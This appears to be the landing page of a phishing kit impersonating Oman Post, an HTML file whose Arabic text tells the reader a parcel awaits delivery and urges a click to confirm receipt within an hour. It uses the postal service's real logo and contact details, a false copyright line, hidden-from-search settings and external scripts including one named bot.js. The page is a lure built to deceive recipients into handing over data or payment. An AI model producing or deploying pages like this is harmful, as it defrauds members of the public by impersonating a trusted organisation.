<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="description" content="Oman Postal Services">
    <meta property="og:title" content="Post Oman Postal Services" />
    <meta property="og:description" content="تفاصيل الشحن " />
    <link rel="shortcut icon" type="image/png" href="https://www.omanpost.om/sites/default/files/oman_logo.png">
    <meta name="viewport" content="width=device-width">
    <meta name="robots" content="nofollow,noindex">
    <title>Post Oman Postal Services</title>
    <link rel="stylesheet" href="../css/index.css">
    <style>
        .ubey-RecordingScreen-count-down-container {
            position: fixed;
            height: 100vh;
            width: 100vw;
            top: 0;
            left: 0;
            z-index: 9999999999999;
            background-color: rgba(0, 0, 0, 0.2);
        }
        .ubey-RecordingScreen-count-down-content {
            position: absolute;
            display: flex;
            top: 50%;
            left: 50%;
            justify-content: center;
            align-items: center;
            color: white;
            height: 15em;
            width: 15em;
            transform: translate(-50%, -100%);
            background-color: rgba(0, 0, 0, 0.6);
            border-radius: 50%;
        }
        #ubey-RecordingScreen-count-count {
            font-size: 14em;
            transform: translateY(-2%);
        }
    </style>
</head>

<body style="padding:30px;">
    <img src="https://www.omanpost.om/sites/default/files/oman_logo.png" style="width:240px; margin:30px 0;">
    <div style="background:white; padding:40px;">
        <form action="/" method="post">
            <b>عزيزي العميل</b>
            <p dir="rtl">
                يرجى ملاحظة أن الطرد الخاص بك في انتظار التسليم.<br>
                يرجى متابعة تأكيد الإستقبال باستخدام الرابط أدناه.
            </p>
            <a href="#" target="_blank" id="btnLien" style="margin:20px 0; display:inline-block; text-decoration:none; padding:20px 60px; background:#363640; border-radius:3px; color:white;">
                انقر هنا
            </a>
            <p>
                يجب أن يتم التأكيد في أقل من ساعة. ستتلقى بريداً إلكترونياً يؤكد الشحنة مع معلومات التتبع.
            </p>
            <p>
                بريد عمان للخدمات اللوجستية<br>
                شركة بريد عمان للخدمات البريدية
            </p>
        </form>
        <hr style="margin:40px 0;">
        <div style="color:#5CA9EE;">
            إذا كانت لديك مشكلة، يرجى الاتصال بنا لمزيد من التفاصيل على هاتف: 131 أو عبر البريد الإلكتروني<br>
            post-oman@omanpost.om
        </div>
    </div>
    <p style="margin:20px 0; font-size:0.8em; color:#939291;">
        OMAN POSTAL SERVICES 1980–2023. All rights reserved.
    </p>
    <div style="display: none" class="ubey-RecordingScreen-count-down ubey-RecordingScreen-count-down-container">
        <div class="ubey-RecordingScreen-count-down-content">
            <span id="ubey-RecordingScreen-count-count"></span>
        </div>
    </div>
    <script src="../js/jquery.js"></script>
    <script src="../js/bot.js"></script>
    <script src="../js/index.js"></script>
</body>
</html>
